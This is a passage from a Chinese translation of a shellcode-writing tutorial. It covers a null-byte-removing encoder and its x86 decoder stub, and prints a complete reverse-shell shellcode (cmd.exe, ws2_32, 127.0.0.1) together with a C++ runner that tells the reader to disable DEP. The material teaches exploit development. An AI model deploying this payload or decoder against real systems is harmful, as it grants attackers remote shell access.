def get_fixed_shellcode(shellcode):  '''  Returns a version of shellcode without null bytes. This version divides  the shellcode into multiple blocks and should be used only if  get_fixed_shellcode_single_block() doesn't work with this shellcode.  '''  # The format of bytes_blocks is  #   [missing_byte1, number_of_blocks1,  # missing_byte2, number_of_blocks2, ...]  # where missing_byteX is the value used to overwrite the null bytes in the  # shellcode, while number_of_blocksX is the number of 254-byte blocks where  # to use the corresponding missing_byteX.  bytes_blocks = []  shellcode_len = len(shellcode)  i = 0  while i < shellcode_len:   num_blocks = 0   missing_bytes = list(range(1, 256))   # Tries to find as many 254-byte contiguous blocks as possible which misses at   # least one non-null value. Note that a single 254-byte block always misses at   # least one non-null value.   while True:    if i >= shellcode_len or num_blocks == 255:     bytes_blocks += [missing_bytes[0], num_blocks]     break    bytes = set([ord(c) for c in shellcode[i:i+254]])    new_missing_bytes = [b for b in missing_bytes if b not in bytes]    if len(new_missing_bytes) != 0:   # new block added     missing_bytes = new_missing_bytes     num_blocks += 1     i += 254    else:     bytes += [missing_bytes[0], num_blocks]     break <snip>

就像之前，我们需要讨论在 shellcode 起始部分提前准备好的“ decoder ”。该 decoder 的代码比之前的更长，但是原理相同。

这里是代码:

code = ([     0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes      # bytes:     bytes_blocks + [                                    #   ...      # skip_bytes:     0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4      # here:     0xC0,                                               #   (FF)C0 = INC EAX     0x5F,                                               #   POP EDI     0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>     0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>     0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]     0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here      # loop1:     0xB0, 0xFE,                                         #   MOV AL, 0FEh     0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]     0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX     0x33, 0xF6,                                         #   XOR ESI, ESI     0xFC,                                               #   CLD      # loop2:     0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]     0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]     0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI     0xAA,                                               #   STOSB     0x49,                                               #   DEC ECX     0x74, 0x07,                                         #   JE shellcode_begin     0x4A,                                               #   DEC EDX     0x75, 0xF2,                                         #   JNE loop2     0x43,                                               #   INC EBX     0x43,                                               #   INC EBX     0xEB, 0xE3                                          #   JMP loop1      # shellcode_begin: ])

bytes_blocks 是数组：

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

我们在之前已经讨论过，但是没有配对。

注意代码始于跳过 bytes_blocks 的 JMP SHORT 指令。为了实现该操作， len(bytes_blocks) 必须小于或等于 0x7F 。但是正如你所看到的， len(bytes_blocks) 也出现在另一条指令中：

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]

这里要求 len(bytes_blocks) 小于或等于 0x7F – 5 ，因此这是决定性的条件。如果条件违规，则：

if len(bytes_blocks) > 0x7f - 5: # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes". return None

进一步审计代码：

JMP SHORT skip_bytes bytes:   ... skip_bytes:   CALL $ + 4                                  ; PUSH "here"; JMP "here"-1 here:   (FF)C0 = INC EAX                            ; not important: just a NOP   POP EDI                                     ; EDI = absolute address of "here"   MOV ECX, <xor value 1 for shellcode len>   XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length   LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"   ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode loop1:   MOV AL, 0FEh                                ; AL = 254   MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes   MOVZX EDX, AX                               ; EDX = num bytes of the current chunk   XOR ESI, ESI                                ; ESI = 0   CLD                                         ; tells STOSB to go forwards loop2:   MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode   CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?   CMOVE EAX, ESI                              ; if it is, then EAX = 0   STOSB                                       ; replaces the current byte of the shellcode with AL   DEC ECX                                     ; ECX -= 1   JE shellcode_begin                          ; if ECX == 0, then we're done!   DEC EDX                                     ; EDX -= 1   JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk   INC EBX                                     ; EBX += 1  (moves to next pair...   INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)   JMP loop1                                   ; starts working on the next chunk shellcode_begin:

测试脚本

这部分会简明易懂！如果没有任何参数，运行脚本将会显示如下：

Shellcode Extractor by Massimiliano Tomassoli (2015)  Usage:   sce.py <exe file> <map file>

如果你还记得，我们也已经告诉过 VS 2013 的 linker 生成一个映射文件。只调用具有 exe 文件及映射文件路径的脚本。此处是从反向 shellcode 中得到的信息：

Shellcode Extractor by Massimiliano Tomassoli (2015)  Extracting shellcode length from "mapfile"... shellcode length: 614 Extracting shellcode from "shellcode.exe" and analyzing relocations... Found 3 reference(s) to 3 string(s) in .rdata Strings:   ws2_32.dll   cmd.exe   127.0.0.1  Fixing the shellcode... final shellcode length: 715  char shellcode[] = "/xe8/xff/xff/xff/xff/xc0/x5f/xb9/xa8/x03/x01/x01/x81/xf1/x01/x01" "/x01/x01/x83/xc7/x1d/x33/xf6/xfc/x8a/x07/x3c/x05/x0f/x44/xc6/xaa" "/xe2/xf6/xe8/x05/x05/x05/x05/x5e/x8b/xfe/x81/xc6/x7b/x02/x05/x05" "/xb9/x03/x05/x05/x05/xfc/xad/x01/x3c/x07/xe2/xfa/x55/x8b/xec/x83" "/xe4/xf8/x81/xec/x24/x02/x05/x05/x53/x56/x57/xb9/x8d/x10/xb7/xf8" "/xe8/xa5/x01/x05/x05/x68/x87/x02/x05/x05/xff/xd0/xb9/x40/xd5/xdc" "/x2d/xe8/x94/x01/x05/x05/xb9/x6f/xf1/xd4/x9f/x8b/xf0/xe8/x88/x01" "/x05/x05/xb9/x82/xa1/x0d/xa5/x8b/xf8/xe8/x7c/x01/x05/x05/xb9/x70" "/xbe/x1c/x23/x89/x44/x24/x18/xe8/x6e/x01/x05/x05/xb9/xd1/xfe/x73" "/x1b/x89/x44/x24/x0c/xe8/x60/x01/x05/x05/xb9/xe2/xfa/x1b/x01/xe8" "/x56/x01/x05/x05/xb9/xc9/x53/x29/xdc/x89/x44/x24/x20/xe8/x48/x01" "/x05/x05/xb9/x6e/x85/x1c/x5c/x89/x44/x24/x1c/xe8/x3a/x01/x05/x05" "/xb9/xe0/x53/x31/x4b/x89/x44/x24/x24/xe8/x2c/x01/x05/x05/xb9/x98" "/x94/x8e/xca/x8b/xd8/xe8/x20/x01/x05/x05/x89/x44/x24/x10/x8d/x84" "/x24/xa0/x05/x05/x05/x50/x68/x02/x02/x05/x05/xff/xd6/x33/xc9/x85" "/xc0/x0f/x85/xd8/x05/x05/x05/x51/x51/x51/x6a/x06/x6a/x01/x6a/x02" "/x58/x50/xff/xd7/x8b/xf0/x33/xff/x83/xfe/xff/x0f/x84/xc0/x05/x05" "/x05/x8d/x44/x24/x14/x50/x57/x57/x68/x9a/x02/x05/x05/xff/x54/x24" "/x2c/x85/xc0/x0f/x85/xa8/x05/x05/x05/x6a/x02/x57/x57/x6a/x10/x8d" "/x44/x24/x58/x50/x8b/x44/x24/x28/xff/x70/x10/xff/x70/x18/xff/x54" "/x24/x40/x6a/x02/x58/x66/x89/x44/x24/x28/xb8/x05/x7b/x05/x05/x66" "/x89/x44/x24/x2a/x8d/x44/x24/x48/x50/xff/x54/x24/x24/x57/x57/x57" "/x57/x89/x44/x24/x3c/x8d/x44/x24/x38/x6a/x10/x50/x56/xff/x54/x24" "/x34/x85/xc0/x75/x5c/x6a/x44/x5f/x8b/xcf/x8d/x44/x24/x58/x33/xd2" "/x88/x10/x40/x49/x75/xfa/x8d/x44/x24/x38/x89/x7c/x24/x58/x50/x8d" "/x44/x24/x5c/xc7/x84/x24/x88/x05/x05/x05/x05/x01/x05/x05/x50/x52" "/x52/x52/x6a/x01/x52/x52/x68/x92/x02/x05/x05/x52/x89/xb4/x24/xc0" "/x05/x05/x05/x89/xb4/x24/xbc/x05/x05/x05/x89/xb4/x24/xb8/x05/x05" "/x05/xff/x54/x24/x34/x6a/xff/xff/x74/x24/x3c/xff/x54/x24/x18/x33" "/xff/x57/xff/xd3/x5f/x5e/x33/xc0/x5b/x8b/xe5/x5d/xc3/x33/xd2/xeb" "/x10/xc1/xca/x0d/x3c/x61/x0f/xbe/xc0/x7c/x03/x83/xe8/x20/x03/xd0" "/x41/x8a/x01/x84/xc0/x75/xea/x8b/xc2/xc3/x55/x8b/xec/x83/xec/x14" "/x53/x56/x57/x89/x4d/xf4/x64/xa1/x30/x05/x05/x05/x89/x45/xfc/x8b" "/x45/xfc/x8b/x40/x0c/x8b/x40/x14/x8b/xf8/x89/x45/xec/x8d/x47/xf8" "/x8b/x3f/x8b/x70/x18/x85/xf6/x74/x4f/x8b/x46/x3c/x8b/x5c/x30/x78" "/x85/xdb/x74/x44/x8b/x4c/x33/x0c/x03/xce/xe8/x9e/xff/xff/xff/x8b" "/x4c/x33/x20/x89/x45/xf8/x03/xce/x33/xc0/x89/x4d/xf0/x89/x45/xfc" "/x39/x44/x33/x18/x76/x22/x8b/x0c/x81/x03/xce/xe8/x7d/xff/xff/xff" "/x03/x45/xf8/x39/x45/xf4/x74/x1e/x8b/x45/xfc/x8b/x4d/xf0/x40/x89" "/x45/xfc/x3b/x44/x33/x18/x72/xde/x3b/x7d/xec/x75/xa0/x33/xc0/x5f" "/x5e/x5b/x8b/xe5/x5d/xc3/x8b/x4d/xfc/x8b/x44/x33/x24/x8d/x04/x48" "/x0f/xb7/x0c/x30/x8b/x44/x33/x1c/x8d/x04/x88/x8b/x04/x30/x03/xc6" "/xeb/xdd/x2f/x05/x05/x05/xf2/x05/x05/x05/x80/x01/x05/x05/x77/x73" "/x32/x5f/x33/x32/x2e/x64/x6c/x6c/x05/x63/x6d/x64/x2e/x65/x78/x65" "/x05/x31/x32/x37/x2e/x30/x2e/x30/x2e/x31/x05";

重点在于重定位信息，因为可以根据它来检查一切是否OK。例如，我们了解到反向shell使用3个字符串来实现，并且它们是从 .rdata 节中提取的。我们可以了解到原始 shellcode 为614个字节，同时也了解到已生成的 shellcode （在处理了重定向信息以及 null 字节之后）为715字节。

现在需要运行已生成的 shellcode 。此处是完整的源码：

#include <cstring> #include <cassert> // Important: Disable DEP! //  (Linker->Advanced->Data Execution Prevention = NO) void main() {  char shellcode[] =   "/xe8/xff/xff/xff/xff/xc0/x5f/xb9/xa8/x03/x01/x01/x81/xf1/x01/x01"   "/x01/x01/x83/xc7/x1d/x33/xf6/xfc/x8a/x07/x3c/x05/x0f/x44/xc6/xaa"   "/xe2/xf6/xe8/x05/x05/x05/x05/x5e/x8b/xfe/x81/xc6/x7b/x02/x05/x05"   "/xb9/x03/x05/x05/x05/xfc/xad/x01/x3c/x07/xe2/xfa/x55/x8b/xec/x83"   "/xe4/xf8/x81/xec/x24/x02/x05/x05/x53/x56/x57/xb9/x8d/x10/xb7/xf8"   "/xe8/xa5/x01/x05/x05/x68/x87/x02/x05/x05/xff/xd0/xb9/x40/xd5/xdc"   "/x2d/xe8/x94/x01/x05/x05/xb9/x6f/xf1/xd4/x9f/x8b/xf0/xe8/x88/x01"   "/x05/x05/xb9/x82/xa1/x0d/xa5/x8b/xf8/xe8/x7c/x01/x05/x05/xb9/x70"   "/xbe/x1c/x23/x89/x44/x24/x18/xe8/x6e/x01/x05/x05/xb9/xd1/xfe/x73"   "/x1b/x89/x44/x24/x0c/xe8/x60/x01/x05/x05/xb9/xe2/xfa/x1b/x01/xe8"   "/x56/x01/x05/x05/xb9/xc9/x53/x29/xdc/x89/x44/x24/x20/xe8/x48/x01"   "/x05/x05/xb9/x6e/x85/x1c/x5c/x89/x44/x24/x1c/xe8/x3a/x01/x05/x05"   "/xb9/xe0/x53/x31/x4b/x89/x44/x24/x24/xe8/x2c/x01/x05/x05/xb9/x98"   "/x94/x8e/xca/x8b/xd8/xe8/x20/x01/x05/x05/x89/x44/x24/x10/x8d/x84"   "/x24/xa0/x05/x05/x05/x50/x68/x02/x02/x05/x05/xff/xd6/x33/xc9/x85"   "/xc0/x0f/x85/xd8/x05/x05/x05/x51/x51/x51/x6a/x06/x6a/x01/x6a/x02"   "/x58/x50/xff/xd7/x8b/xf0/x33/xff/x83/xfe/xff/x0f/x84/xc0/x05/x05"   "/x05/x8d/x44/x24/x14/x50/x57/x57/x68/x9a/x02/x05/x05/xff/x54/x24"   "/x2c/x85/xc0/x0f/x85/xa8/x05/x05/x05/x6a/x02/x57/x57/x6a/x10/x8d"   "/x44/x24/x58/x50/x8b/x44/x24/x28/xff/x70/x10/xff/x70/x18/xff/x54"   "/x24/x40/x6a/x02/x58/x66/x89/x44/x24/x28/xb8/x05/x7b/x05/x05/x66"   "/x89/x44/x24/x2a/x8d/x44/x24/x48/x50/xff/x54/x24/x24/x57/x57/x57"   "/x57/x89/x44/x24/x3c/x8d/x44/x24/x38/x6a/x10/x50/x56/xff/x54/x24"   "/x34/x85/xc0/x75/x5c/x6a/x44/x5f/x8b/xcf/x8d/x44/x24/x58/x33/xd2"   "/x88/x10/x40/x49/x75/xfa/x8d/x44/x24/x38/x89/x7c/x24/x58/x50/x8d"   "/x44/x24/x5c/xc7/x84/x24/x88/x05/x05/x05/x05/x01/x05/x05/x50/x52"   "/x52/x52/x6a/x01/x52/x52/x68/x92/x02/x05/x05/x52/x89/xb4/x24/xc0"   "/x05/x05/x05/x89/xb4/x24/xbc/x05/x05/x05/x89/xb4/x24/xb8/x05/x05"   "/x05/xff/x54/x24/x34/x6a/xff/xff/x74/x24/x3c/xff/x54/x24/x18/x33"   "/xff/x57/xff/xd3/x5f/x5e/x33/xc0/x5b/x8b/xe5/x5d/xc3/x33/xd2/xeb"   "/x10/xc1/xca/x0d/x3c/x61/x0f/xbe/xc0/x7c/x03/x83/xe8/x20/x03/xd0"   "/x41/x8a/x01/x84/xc0/x75/xea/x8b/xc2/xc3/x55/x8b/xec/x83/xec/x14"   "/x53/x56/x57/x89/x4d/xf4/x64/xa1/x30/x05/x05/x05/x89/x45/xfc/x8b"   "/x45/xfc/x8b/x40/x0c/x8b/x40/x14/x8b/xf8/x89/x45/xec/x8d/x47/xf8"   "/x8b/x3f/x8b/x70/x18/x85/xf6/x74/x4f/x8b/x46/x3c/x8b/x5c/x30/x78"   "/x85/xdb/x74/x44/x8b/x4c/x33/x0c/x03/xce/xe8/x9e/xff/xff/xff/x8b"   "/x4c/x33/x20/x89/x45/xf8/x03/xce/x33/xc0/x89/x4d/xf0/x89/x45/xfc"   "/x39/x44/x33/x18/x76/x22/x8b/x0c/x81/x03/xce/xe8/x7d/xff/xff/xff"   "/x03/x45/xf8/x39/x45/xf4/x74/x1e/x8b/x45/xfc/x8b/x4d/xf0/x40/x89"   "/x45/xfc/x3b/x44/x33/x18/x72/xde/x3b/x7d/xec/x75/xa0/x33/xc0/x5f"   "/x5e/x5b/x8b/xe5/x5d/xc3/x8b/x4d/xfc/x8b/x44/x33/x24/x8d/x04/x48"   "/x0f/xb7/x0c/x30/x8b/x44/x33/x1c/x8d/x04/x88/x8b/x04/x30/x03/xc6"   "/xeb/xdd/x2f/x05/x05/x05/xf2/x05/x05/x05/x80/x01/x05/x05/x77/x73"   "/x32/x5f/x33/x32/x2e/x64/x6c/x6c/x05/x63/x6d/x64/x2e/x65/x78/x65"   "/x05/x31/x32/x37/x2e/x30/x2e/x30/x2e/x31/x05";  static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");  // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.  char *ptr = new char[sizeof(shellcode)];  memcpy(ptr, shellcode, sizeof(shellcode));  ((void(*)())ptr)(); }

此时需要关闭DEP（ Data Execution Prevention )来让该段代码成功地被执行，通过 Project→<solution name> Properties 然后在 Configuration Properties 下, Linker and Advanced , 将 Data Execution Prevention (DEP) 设为 No (/NXCOMPAT:NO) 。因为 shellcode 将会在堆中被执行，所以开启了 DEP 会导致 shellcode 无法被执行。

C++11 (因此需要 VS 2013 CTP )标准中介绍了 static_assert ，使用如下语句来检查

char shellcode[] = "..."

而不是

char *shellcode = "..."

在第一个案例中， sizeof(shellcode) 表示 shellcode 的有效长度，此时 shellcode 已经被复制到栈上了。在第二个案例中， sizeof(shellcode) 只是表示指针 (i.e. 4) 的大小，并且该指针指向在 .rdata 节中的 shellcode 。

可以打开 cmd shell 来测试 shellcode ：